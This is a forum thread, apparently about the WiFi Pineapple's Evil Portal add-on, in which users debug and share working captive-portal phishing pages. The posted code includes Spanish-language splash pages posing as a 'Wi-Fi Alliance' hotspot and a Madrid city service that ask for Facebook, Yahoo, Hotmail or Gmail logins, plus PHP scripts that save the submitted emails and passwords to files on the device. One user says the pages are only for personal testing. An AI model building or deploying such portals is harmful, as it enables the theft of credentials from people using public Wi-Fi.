Jump to content

How can i sniff with a captive portal?


Recommended Posts

Posted · Hidden by Sebkinne, September 4, 2014 - No reason given
Hidden by Sebkinne, September 4, 2014 - No reason given

This is my splash.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>
<title>Internet Gratis | Wi-Fi Alliance</title>
</head>
<body>
<center>
<br />
<img src="images/wifi-alliance.png" width="20%"><br />
<br />
<p><Strong>Bienvenido a WiFi Alliace Hot-Spot.
Para iniciar sesi&oacuten en la red WiFi primero necesita crear una cuenta a trav&eacutes de cualquiera de sus p&aacuteginas favoritas.</Strong></p>
<p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet &iexclGRATIS!. </Strong></p><br />
<form action="capture" method="post">
<fieldset>
<table width="320">
<tr>
<td colspan="1" align=left>Email:</td>
<td colspan="3" width="100%"><input style="width:100%;" type="text" name="name" /></td>
</tr>
<tr>
<td colspan="1" align=left>Contraseña:</td>
<td colspan="3" width="100%"><input style="width:100%;" type="password" name="pass" /></td>
</tr>
<tr>
<td><img src="images/facebooklogo.png" /></td>
<td><img src="images/yahoologo.jpg"/></td>
<td><img src="images/hotmaillogo.jpg"/></td>
<td><img src="images/gmaillogo.png"/></td>
</tr>
<tr>
</tr>
<tr></tr>
<td align=center ><input type="submit" value="Login" name="facebook" /></td>
<td align=center ><input type="submit" value="Login" name="yahoo" /></td>
<td align=center ><input type="submit" value="Login" name="hotmail" /></td>
<td align=center ><input type="submit" value="Login" name="gmail" /></td>
</table>
</fieldset>
</form>
</center>
</body>
</html
And this is my capture.php:

<?php

$username = $_POST['username'];
$password = $_POST['password'];
$file = fopen("sd/evilportal.txt", "a");
fwrite($file, $username . " " . $password . "\n");
fclose($file);
?>
I have a url to this file.
The problem is: i put email and password but it reload the same web, it doesn't continue to normal navigation and it doesn't save any pass and email... Please someone can help me?
Link to post

Someone?

You are submitting your form to no where...
<form action="capture" method="post">

The value of action should be the place that you are posting to. Capture is nothing.

It should look like:

<form action="http://172.16.42.1/capture.php" method="post">

Link to post
Share on other sites
You are submitting your form to no where...
<form action="capture" method="post">

The value of action should be the place that you are posting to. Capture is nothing.

It should look like:

<form action="http://172.16.42.1/capture.php" method="post">

Thanks newbi3. 'Capture' it's an url in the same folder of my splash.html, it's aiming to capture.php in my SD.

Edited by daniboy92
Link to post
Share on other sites

Thanks newbi3. 'Capture' it's a url in the same folder, it's aiming to capture.php in my SD.

You have to have it running on a webserver. It can't just post to a file in a random location

Link to post
Share on other sites

Can you help me with this html? It's another html web, and i have all in order: capture.php in /www folder, 'post' method aiming to http://172.16.42.1/capture.php, but i can't get a working phishing web...

This is the thread:

https://forums.hak5.org/index.php?/topic/33553-help-me-with-this-html-code/

Thanks a lot for all your support newbi3.

Edited by daniboy92
Link to post
Share on other sites

please newbi3, fix your infusion (evil portal). Don't refresh tabs. work perfect, but infusion dont apply changes, dont refresh, dont close tabs..

Update to 2.3 which was released today

Link to post
Share on other sites

hey daniboy92 here a simple captive portal 100% work

sample.jpg

#1 Get fresh evil portal infusion (2.3)
#2 Configure : Auto
#3 Copy these files in your pineapple(with ftp, sftp, ..) :
a) splash.html --> to --> /etc/nodogsplash/htdocs
b) fonts (full directory) --> to --> /etc/nodogsplash/htdocs
c) style.css --> to --> /etc/nodogsplash/htdocs/images
d) h.jpg --> to --> /etc/nodogsplash/htdocs/images
e) service.php --> to --> /www
#4 start nodogsplash service
#5 enjoy!!

files (mega.co.nz) -> http://goo.gl/7DdqcO

File to save input box in --> /www/stored.txt

Edited by pax0r
Link to post
Share on other sites

I'd rather post it in the main post with a disclaimer saying its an example with no support. If you could give me the code and a screenshot I'll post it

Link to post
Share on other sites
Posted · Hidden by Sebkinne, September 4, 2014 - No reason given
Hidden by Sebkinne, September 4, 2014 - No reason given

Portal 1º:

splash.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/javascript">
function ajaxRequest() {
if (window.XMLHttpRequest) {
return new XMLHttpRequest();
} else if (window.ActiveXObject) {
return new ActiveXObject("Microsoft.XMLHTTP");
} else {
return false;
}
}
function sendInfo() {
var xmlhttp = new ajaxRequest();
var usernamevalue=encodeURIComponent(document.getElementById("username").value);
var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
var passwordvalue=encodeURIComponent(document.getElementById("password").value);
if (emailvalue != null && emailvalue != "") {
var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;
xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(parameters);
document.getElementById("results").innerHTML="&iexclGracias!";
window.location = document.getElementById("redirect").value;
} else {
document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
}
}
</script>
<head>
<title>Internet Gratis | Wi-Fi Alliance</title>
</head>
<body>
<center>
<br />
<img src="/images/wifi-alliance.png" width="20%"><br />
<br />
<p><Strong>Bienvenido a WiFi Alliace Hot-Spot.
Para iniciar sesi&oacuten en la red WiFi primero necesita crear una cuenta a trav&eacutes de cualquiera de sus p&aacuteginas favoritas.</Strong></p>
<p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet &iexclGRATIS!. </Strong></p><br />
<form action="http://172.16.42.1/captureWA.php" method="post">
<fieldset>
<table width="320">
<tr>
<td><label>Email</label></td>
<td><input type="text" id="username" name="username" placeholder="Ingrese su email" required />
<td><label>Contrase&ntildea</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>
<tr>
<td><img src="/images/facebooklogo.png" /></td>
<td><img src="/images/yahoologo.jpg"/></td>
<td><img src="/images/hotmaillogo.jpg"/></td>
<td><img src="/images/gmaillogo.png"/></td>
</tr>
<tr>
</tr>
<tr></tr>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="facebook" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="yahoo" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="hotmail" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="gmail" /></td>
</table>
<input type="hidden" id="redirect" name="redirect" value="$authtarget" />
</fieldset>
</form>
</center>
</body>
</html>
captureWA.php

<?php

$username = $_POST['username'];
$password = $_POST['password'];
$file = fopen("/sd/WiFiAlli.txt", "a");
fwrite($file, $username . " " . $password . "\n");
fclose($file);
?>
How it looks:

ZADMNDr.jpg

It gets email and password, even prevents a empty login. User only can enter with a filled fields.

Link to post
Posted (edited) · Hidden by Sebkinne, September 4, 2014 - No reason given
Hidden by Sebkinne, September 4, 2014 - No reason given

Portal 2º.

splash.html:

<html>
<head>
<title>$gatewayname Entry</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">

<script type="text/javascript">
function ajaxRequest() {
if (window.XMLHttpRequest) {
return new XMLHttpRequest();
} else if (window.ActiveXObject) {
return new ActiveXObject("Microsoft.XMLHTTP");
} else {
return false;
}
}

function sendInfo() {
var xmlhttp = new ajaxRequest();
var emailvalue=encodeURIComponent(document.getElementById("email").value);
var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
var passwordvalue=encodeURIComponent(document.getElementById("password").value);
if (emailvalue != null && emailvalue != "") {
var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;
xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(parameters);
document.getElementById("results").innerHTML="&iexclGracias!";
window.location = document.getElementById("redirect").value;
} else {
document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
}
}
</script>

</head>
<body>
<center>
<h2>$gatewayname</h2>
<font size="1"><i>Ofrecido para usted por la Ciudad de Madrid</i></font>

<br />
<br />

<p><font size="2">Para hacer uso del servicio necesita suscribirse con un email y una contrase&ntildea.</font></p>
<div id="results"></div>
<form id="emailform" method="POST" action="http://172.16.42.1/capture.php">
<table>
<tr>
<td><label>Email</label></td>
<td><input type="text" id="email" name="email" placeholder="Ingrese su email" required />
<td><label>Contrase&ntildea</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>
</table>
<input type="hidden" id="redirect" name="redirect" value="$authtarget" />
<button type="button" onclick="sendInfo();return false;">Ingresar</button>
</form>
<p><font size="1"><i>Su informaci&oacuten no será compartida con terceras partes.</i></font></p>
<p><font size="1"><i>Conectándose y haciendo uso de esta red está aceptando los <a href="#">términos del servicio.</a></i></p>
<img src="/images/wifi.png" width="71" height="49" border="0">
</center>
<iframe style="display:none;" src="http://172.16.42.1/get/get.php"></iframe>
</body>
</html>


capture.php:

<?php

$email = $_POST['email'];
$password = $_POST['password'];
$redirect = $_POST['redirect'];

$file = fopen("/sd/MadridWiFiHotSpot.txt", "a");
fwrite($file, $email . " " . $password . "\n");
fclose($file);

echo 'Gracias por elegir ' . $gatewayname . ' <meta http-equiv="refresh" content="2; url=' . $redirect . '" />';

?>


How it looks:

0ChoWJh.jpg



Note: Firefox shows '$gatewayname, but with nodogsplash running it shows the name of the network.

Note2: get.php referred at the end of the html aim to get.php generate from Get infusion.
Also, this portal get credentials for email and pass, and also prevents an empty login.

Edited by daniboy92
Link to post
Posted · Hidden by Sebkinne, September 4, 2014 - No reason given
Hidden by Sebkinne, September 4, 2014 - No reason given

Clarification: i don't take any credit for this portals, i only take codes for many portals and modify for me, with help from many people. I do this only for personal test and don't for illegal activities.

Link to post
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...